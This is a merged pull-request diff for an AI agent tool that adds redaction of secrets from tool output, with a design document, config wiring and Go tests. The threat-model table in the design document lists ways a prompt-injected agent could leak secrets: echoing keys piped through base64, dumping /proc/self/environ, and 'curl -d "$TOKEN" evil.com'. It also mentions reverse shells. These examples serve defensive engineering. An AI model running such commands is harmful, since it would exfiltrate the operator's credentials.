Merged
4 changes: 4 additions & 0 deletions cmd/odek/subagent.go
@@ -13,6 +13,7 @@ import (
	"github.com/BackendStack21/odek/internal/config"
	"github.com/BackendStack21/odek/internal/danger"
	"github.com/BackendStack21/odek/internal/llm"
	"github.com/BackendStack21/odek/internal/redact"
	"github.com/BackendStack21/odek/internal/render"
	"github.com/BackendStack21/odek/internal/skills"
)
@@ -263,6 +264,9 @@ func subagentCmd(args []string) error {
	// tool the agent runs that prints its own env.
	if fdKey := readKeyFromInheritedFD(); fdKey != "" {
		resolved.APIKey = fdKey
		// Register the FD-supplied key so it is redacted from tool output
		// (LoadConfig only saw the env-resolved value, which may be empty here).
		redact.RegisterSecret(fdKey)
	}

	// Apply parent-supplied trust constraints. When the parent marked the
127 changes: 127 additions & 0 deletions docs/REDACTION_HARDENING.md
@@ -0,0 +1,127 @@
# Redaction Hardening Plan

Status: in progress. The first increment (known-value redaction + Telegram
token pattern) ships in `internal/redact`. This document is the roadmap for
making the redaction layer robust against the full set of known attacks on
**the tools surface**, and an honest statement of what redaction can and
cannot defend.

---

## Scope and why

odek's redaction layer (`internal/redact`) sanitises **tool output** before it
is appended to the conversation and persisted to the session
(`internal/loop/loop.go`, `internal/session/session.go`). It exists so that a
secret which surfaces in a command's output — accidentally or because a
prompt-injected agent went looking for it — does not end up in the transcript,
the session file, the model provider's logs, or a Telegram chat.

The surface we harden is deliberately narrow: **what tools return to the
agent.** We do *not* try to scrub odek's own process environment, because the
agent process legitimately needs its secrets — above all the LLM API key it
uses to talk to the model. Removing the key from the process is not an option;
keeping it from *leaking back out through tool output* is. That makes the
redaction layer the right control, and it must be as close to airtight as a
lexical filter can be.

## Threat model (tools surface)

An attacker who has achieved prompt injection drives the agent to disclose a
secret it can read, by routing it through tool output that returns to the
transcript. Concretely:

| # | Vector | Example | Pre-fix status |
|---|--------|---------|----------------|
| 1 | Env dump of well-named, standard-format key | `env`, `printenv` | Caught (format + name patterns) |
| 2 | Bare echo of a non-standard-format secret | `echo $TELEGRAM_BOT_TOKEN` | **Leaked** |
| 3 | Encoded secret | `echo $API_KEY \| base64`, `\| xxd`, `\| rev` | **Leaked** |
| 4 | `/proc` environ dump | `cat /proc/self/environ` | Partially caught (entries are NUL-delimited; the name pattern needs a `NAME=` prefix) |
| 5 | Secret read from a file | `cat ~/.config/odek/secrets.env` | Depends on format |
| 6 | Secret embedded in a longer string | `curl -H "x: $TOKEN" ...` echoed back in verbose output | Depends on format |

Vectors 2–4 are the gaps this work closes.

## Out of scope for redaction (documented limits)

These are **not** solvable by a lexical filter and must be defended elsewhere
(network-egress controls, approval gating, `non_interactive: deny`):

- **Arbitrary transformation**: `gzip`, `openssl enc`, `gpg`, custom character
  substitution, chunking a secret across multiple commands. We precompute the
  *common* encodings (base64, hex, URL percent-encoding, reversed); we cannot
  enumerate all of them.
- **Side-channel exfiltration**: `curl -d "$TOKEN" evil.com`, a reverse
  shell, DNS tunnelling. The secret never returns to the tool surface, so
  redaction never sees it. This is the job of the egress denylist and
  `network_egress: prompt` + `non_interactive: deny` in the danger config.

Redaction is a **safety net against disclosure into the transcript**, not a
guarantee against a determined exfiltration attempt. Defense in depth: pair it
with the egress controls.

---

## Design

Two cooperating layers run inside `RedactSecrets`:

### Layer 1 — Known-value redaction (new)

odek knows its own secrets. We register them at startup and redact the exact
values — plus their common encodings — wherever they appear, regardless of
format. This closes vectors 2, 3, and 4 for odek's own secrets.

- `RegisterSecret(value)` — records a value and its encodings: base64
(std/raw/url), hex (upper/lower), percent-encoding, reversed.
- `RegisterSecretsFromEnv()` — registers values of env vars whose name has a
secret-bearing segment (`KEY`, `TOKEN`, `SECRET`, `PASSWORD`, `PASS`,
`CREDENTIAL`, …), matched on whole `_`/`-` segments so `GIT_AUTHOR_NAME`
(AUTHOR) and `compass` (PASS) are *not* treated as secrets.
- Seeded once in `config.LoadConfig` from the resolved API key, the Telegram
bot token, and the environment; and in the subagent path for the
FD-supplied key.
- Values shorter than `minSecretLen` (8) are ignored to avoid over-redacting
ordinary text. Matching is literal (a `strings.Replacer`), so no regex
metacharacter or ReDoS risk from arbitrary secret contents.
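
As a rough illustration of the known-value idea described in the list above, the sketch below precomputes the listed encodings for each secret and feeds them to a `strings.Replacer`. It is not the code in `internal/redact`: the names `forms`, `reverse`, `newRedactor`, and `minLen` are hypothetical, and using `url.QueryEscape` for the percent-encoded form is an assumption.

```go
package main

import (
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"net/url"
	"strings"
)

// minLen mirrors the documented minSecretLen (8); the name is illustrative.
const minLen = 8

// reverse returns s with its runes in reverse order.
func reverse(s string) string {
	r := []rune(s)
	for i, j := 0, len(r)-1; i < j; i, j = i+1, j-1 {
		r[i], r[j] = r[j], r[i]
	}
	return string(r)
}

// forms lists the literal strings to redact for one secret: the raw value
// plus the common encodings named in the design. Padded base64 comes before
// the unpadded form so the longer match wins and no "=" is left behind.
func forms(secret string) []string {
	b := []byte(secret)
	h := hex.EncodeToString(b)
	return []string{
		secret,
		base64.StdEncoding.EncodeToString(b),
		base64.RawStdEncoding.EncodeToString(b),
		base64.URLEncoding.EncodeToString(b),
		h,
		strings.ToUpper(h),
		url.QueryEscape(secret), // assumption: stand-in for "percent-encoding"
		reverse(secret),
	}
}

// newRedactor builds a literal replacer for every form of every secret that
// is long enough. Literal matching means secret contents are never compiled
// as a regular expression.
func newRedactor(secrets ...string) *strings.Replacer {
	var pairs []string
	for _, s := range secrets {
		if len(s) < minLen {
			continue // too short: would over-redact ordinary text
		}
		for _, f := range forms(s) {
			pairs = append(pairs, f, "[REDACTED]")
		}
	}
	return strings.NewReplacer(pairs...)
}

func main() {
	secret := "xz9-CUSTOM-internal-credential-2f7b1c4e8d"
	r := newRedactor(secret, "abc")

	fmt.Println(r.Replace("value: " + secret))
	fmt.Println(r.Replace("hex: " + hex.EncodeToString([]byte(secret))))
	fmt.Println(r.Replace("abc appears in normal prose"))
}
```

One limit of this approach is worth keeping in mind: the precomputed forms cover the secret encoded on its own. Base64 of the secret embedded in a longer string (for example `echo "k=$KEY" | base64`) yields different bytes and would fall under the arbitrary-transformation limits listed earlier.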

### Layer 2 — Format patterns (existing, extended)

Regex patterns for secrets we *don't* hold but recognise by shape (a
customer's AWS key in a file, a GitHub PAT, a private key). Extended here with
a **Telegram bot token** pattern (`<bot-id>:<35-char>`), which has no `name=`
context for the generic rule to catch.
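
A shape-based rule for the `<bot-id>:<35-char>` form might look like the sketch below. The exact expression used in `internal/redact` is not shown in this document, so the pattern, the digit-count bounds, and the helper name `redactTelegram` are all assumptions; the sketch also accepts more than 35 trailing characters so that a longer token is not left partly exposed.

```go
package main

import (
	"fmt"
	"regexp"
)

// telegramToken is an illustrative pattern, not the shipped one: a run of
// digits (the bot id), a colon, then 35 or more URL-safe base64 characters.
var telegramToken = regexp.MustCompile(`\b[0-9]{6,12}:[A-Za-z0-9_-]{35,}`)

// redactTelegram replaces anything shaped like a bot token with the marker.
func redactTelegram(s string) string {
	return telegramToken.ReplaceAllString(s, "[REDACTED]")
}

func main() {
	fmt.Println(redactTelegram("bot token is 123456789:AAHfakeTokenValueExample0123456789abcdef"))
	// A host:port pair has too few digits before the colon and too few
	// characters after it, so it passes through untouched.
	fmt.Println(redactTelegram("listening on 127.0.0.1:8080"))
}
```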

## Implemented in this PR

- `internal/redact/redact.go`: known-value registry (`RegisterSecret`,
`RegisterSecretsFromEnv`, `ResetSecrets`), encoding-aware literal matching,
wired into `RedactSecrets` / `HasSecrets` / `CountSecrets`; Telegram
bot-token pattern.
- `internal/config/loader.go`: seed the registry at startup.
- `cmd/odek/subagent.go`: register the FD-supplied API key.
- `internal/redact/known_value_test.go`: coverage for vectors 2–4, env-scan
selectivity, and the short-value guard.
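
The env-scan selectivity that the tests exercise comes down to matching whole `_`/`-` segments of a variable name rather than substrings. A minimal sketch of that check follows; `isSecretName` and `secretSegments` are hypothetical names, and the segment set contains only the entries spelled out in the design section (the real list is longer).

```go
package main

import (
	"fmt"
	"strings"
)

// secretSegments holds only the segments named in the design notes; the
// actual list in internal/redact is elided there and is not reproduced here.
var secretSegments = map[string]bool{
	"KEY": true, "TOKEN": true, "SECRET": true,
	"PASSWORD": true, "PASS": true, "CREDENTIAL": true,
}

// isSecretName reports whether any whole segment of name, split on '_' or
// '-', is a secret-bearing word. Substrings inside a segment do not count.
func isSecretName(name string) bool {
	segs := strings.FieldsFunc(strings.ToUpper(name), func(r rune) bool {
		return r == '_' || r == '-'
	})
	for _, s := range segs {
		if secretSegments[s] {
			return true
		}
	}
	return false
}

func main() {
	names := []string{"ANTHROPIC_API_KEY", "TELEGRAM_BOT_TOKEN", "GIT_AUTHOR_NAME", "compass", "PATH"}
	for _, n := range names {
		fmt.Printf("%-20s %v\n", n, isSecretName(n))
	}
}
```

Splitting first and comparing whole segments is what keeps `compass` from matching `PASS`; a plain `strings.Contains` check would flag it.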

## Follow-ups (not in this PR)

1. **Streaming redaction across chunk boundaries.** A secret split across two
streamed tool-output chunks evades per-chunk redaction. Buffer a sliding
window equal to the longest registered form.
2. **Entropy heuristic for unknown secrets.** Flag high-entropy tokens of
secret-like length that match no pattern and no known value, to catch
third-party secrets read from files (vector 5) — tuned to avoid hashes/UUIDs.
3. **Redaction telemetry.** Count redaction hits per session and surface a
   warning when tool output contained secrets, so operators notice
   exfiltration attempts instead of having them scrubbed silently.
4. **Argument/echo-back coverage (vector 6).** Consider redacting tool *inputs*
(command strings) that embed a known value, not just outputs.
5. **Periodic re-seed.** If secrets can rotate at runtime, re-run
`RegisterSecretsFromEnv` on reload.
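
To make follow-up 1 concrete, here is one possible shape for a chunk-boundary-safe redactor. It is a sketch of the idea, not planned odek code: `streamRedactor`, `newStreamRedactor`, `Write`, and `Flush` are hypothetical names. It withholds the last `longest - 1` bytes of redacted output, which is the most a partially arrived secret can occupy, and re-scans that tail together with the next chunk.

```go
package main

import (
	"fmt"
	"strings"
)

// streamRedactor redacts registered forms even when one is split across
// two chunks of streamed output.
type streamRedactor struct {
	r       *strings.Replacer
	hold    int    // bytes withheld: longest registered form minus one
	pending string // redacted tail not yet released
}

func newStreamRedactor(forms ...string) *streamRedactor {
	var pairs []string
	longest := 0
	for _, f := range forms {
		if f == "" {
			continue // an empty pattern would match everywhere
		}
		pairs = append(pairs, f, "[REDACTED]")
		if len(f) > longest {
			longest = len(f)
		}
	}
	hold := longest - 1
	if hold < 0 {
		hold = 0
	}
	return &streamRedactor{r: strings.NewReplacer(pairs...), hold: hold}
}

// Write redacts pending+chunk and returns the prefix that is safe to emit.
// Any incomplete secret prefix sits at the very end of the buffer and is
// shorter than the longest form, so it always stays in the withheld tail.
func (s *streamRedactor) Write(chunk string) string {
	buf := s.r.Replace(s.pending + chunk)
	if len(buf) <= s.hold {
		s.pending = buf
		return ""
	}
	cut := len(buf) - s.hold
	s.pending = buf[cut:]
	return buf[:cut]
}

// Flush releases the withheld tail once the stream has ended.
func (s *streamRedactor) Flush() string {
	out := s.r.Replace(s.pending)
	s.pending = ""
	return out
}

func main() {
	s := newStreamRedactor("telegram-bot-secret-value-9988776655")
	var out strings.Builder
	for _, chunk := range []string{"TOKEN=telegram-bot-sec", "ret-value-9988776655 done"} {
		out.WriteString(s.Write(chunk))
	}
	out.WriteString(s.Flush())
	fmt.Println(out.String()) // prints "TOKEN=[REDACTED] done"
}
```

The trade-off is latency: output is delayed by up to `hold` bytes until the next chunk or the final flush.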

## Testing

`go test ./internal/redact/` covers each closed vector. New tests:
`TestTelegramBotTokenPattern`, `TestKnownValue_BareEcho`,
`TestKnownValue_Encodings`, `TestKnownValue_ProcEnvironDump`,
`TestRegisterSecretsFromEnv`, `TestRegisterSecret_TooShortIgnored`.
11 changes: 11 additions & 0 deletions internal/config/loader.go
@@ -24,6 +24,7 @@ import (
	"github.com/BackendStack21/odek/internal/danger"
	"github.com/BackendStack21/odek/internal/mcpclient"
	"github.com/BackendStack21/odek/internal/memory"
	"github.com/BackendStack21/odek/internal/redact"
	"github.com/BackendStack21/odek/internal/skills"
	"github.com/BackendStack21/odek/internal/telegram"
)
@@ -727,6 +728,16 @@ func LoadConfig(cli CLIFlags) ResolvedConfig {
	os.Unsetenv("DEEPSEEK_API_KEY")
	os.Unsetenv("OPENAI_API_KEY")

	// Seed the redaction layer with odek's own secrets so they (and their
	// common encodings) are stripped from any tool output, even when the
	// agent prints them in a format the pattern matchers don't recognise.
	// The API key is registered from its resolved value (the unsets above
	// only remove it from the environment, not from resolved.APIKey);
	// RegisterSecretsFromEnv covers .env / secrets.env injected values.
	redact.RegisterSecret(resolved.APIKey)
	redact.RegisterSecret(resolved.Telegram.Token)
	redact.RegisterSecretsFromEnv()

	return resolved
}

126 changes: 126 additions & 0 deletions internal/redact/known_value_test.go
@@ -0,0 +1,126 @@
package redact

import (
	"encoding/base64"
	"encoding/hex"
	"strings"
	"testing"
)

// TestTelegramBotTokenPattern covers the format-pattern gap: a bare Telegram
// bot token has no name= context and no recognised key prefix, so before the
// dedicated pattern it slipped through unredacted.
func TestTelegramBotTokenPattern(t *testing.T) {
	ResetSecrets()
	token := "123456789:AAHfakeTokenValueExample0123456789abcdef"
	out := RedactSecrets("bot token is " + token)
	if strings.Contains(out, token) {
		t.Fatalf("telegram token not redacted by pattern: %q", out)
	}
	if !strings.Contains(out, "[REDACTED]") {
		t.Fatalf("expected [REDACTED] marker, got %q", out)
	}
}

// TestKnownValue_BareEcho covers the core gap: a registered secret whose
// format no pattern recognises must still be redacted when printed verbatim.
func TestKnownValue_BareEcho(t *testing.T) {
	ResetSecrets()
	defer ResetSecrets()

	// A token shape no built-in pattern matches.
	secret := "xz9-CUSTOM-internal-credential-2f7b1c4e8d"
	RegisterSecret(secret)

	if got := RedactSecrets("value: " + secret); strings.Contains(got, secret) {
		t.Fatalf("registered secret leaked in bare echo: %q", got)
	}
	if !HasSecrets(secret) {
		t.Fatalf("HasSecrets should detect a registered value")
	}
}

// TestKnownValue_Encodings covers the "echo $KEY | base64 / xxd" gap: common
// encodings of a registered secret must also be redacted.
func TestKnownValue_Encodings(t *testing.T) {
	ResetSecrets()
	defer ResetSecrets()

	secret := "sk-ant-internal-do-not-leak-abcdef0123456789"
	RegisterSecret(secret)
	b := []byte(secret)

	cases := map[string]string{
		"raw":        secret,
		"base64-std": base64.StdEncoding.EncodeToString(b),
		"base64-raw": base64.RawStdEncoding.EncodeToString(b),
		"base64-url": base64.URLEncoding.EncodeToString(b),
		"hex-lower":  hex.EncodeToString(b),
		"hex-upper":  strings.ToUpper(hex.EncodeToString(b)),
		"reversed":   reverseString(secret),
	}
	for name, enc := range cases {
		out := RedactSecrets("leaked=" + enc)
		if strings.Contains(out, enc) {
			t.Errorf("%s encoding leaked: %q", name, out)
		}
	}
}

// TestKnownValue_ProcEnvironDump simulates `cat /proc/self/environ`, whose
// NUL-delimited output the literal matcher handles regardless of delimiters.
func TestKnownValue_ProcEnvironDump(t *testing.T) {
	ResetSecrets()
	defer ResetSecrets()

	secret := "telegram-bot-secret-value-9988776655"
	RegisterSecret(secret)

	dump := "PATH=/usr/bin\x00HOME=/root\x00TELEGRAM_BOT_TOKEN=" + secret + "\x00TERM=xterm"
	out := RedactSecrets(dump)
	if strings.Contains(out, secret) {
		t.Fatalf("secret leaked in /proc environ dump: %q", out)
	}
}

// TestRegisterSecretsFromEnv only registers values of sensitively-named vars.
func TestRegisterSecretsFromEnv(t *testing.T) {
	ResetSecrets()
	defer func() {
		osEnviron = defaultOsEnviron
		ResetSecrets()
	}()

	secret := "anthropic-key-value-abcdefghij1234567890"
	authorName := "Jane Developer"
	osEnviron = func() []string {
		return []string{
			"ANTHROPIC_API_KEY=" + secret,
			"GIT_AUTHOR_NAME=" + authorName, // AUTHOR must NOT be treated as secret
			"PATH=/usr/bin",
		}
	}
	RegisterSecretsFromEnv()

	if got := RedactSecrets("k=" + secret); strings.Contains(got, secret) {
		t.Errorf("env secret not redacted: %q", got)
	}
	if got := RedactSecrets("author is " + authorName); !strings.Contains(got, authorName) {
		t.Errorf("non-secret env var over-redacted: %q", got)
	}
}

// TestRegisterSecret_TooShortIgnored guards against over-redacting short
// values that would collide with ordinary text.
func TestRegisterSecret_TooShortIgnored(t *testing.T) {
	ResetSecrets()
	defer ResetSecrets()

	RegisterSecret("abc") // below minSecretLen
	if HasSecrets("abc appears in normal prose") {
		t.Fatalf("short value should not have been registered")
	}
}

// defaultOsEnviron preserves the production osEnviron for restore in tests.
var defaultOsEnviron = osEnviron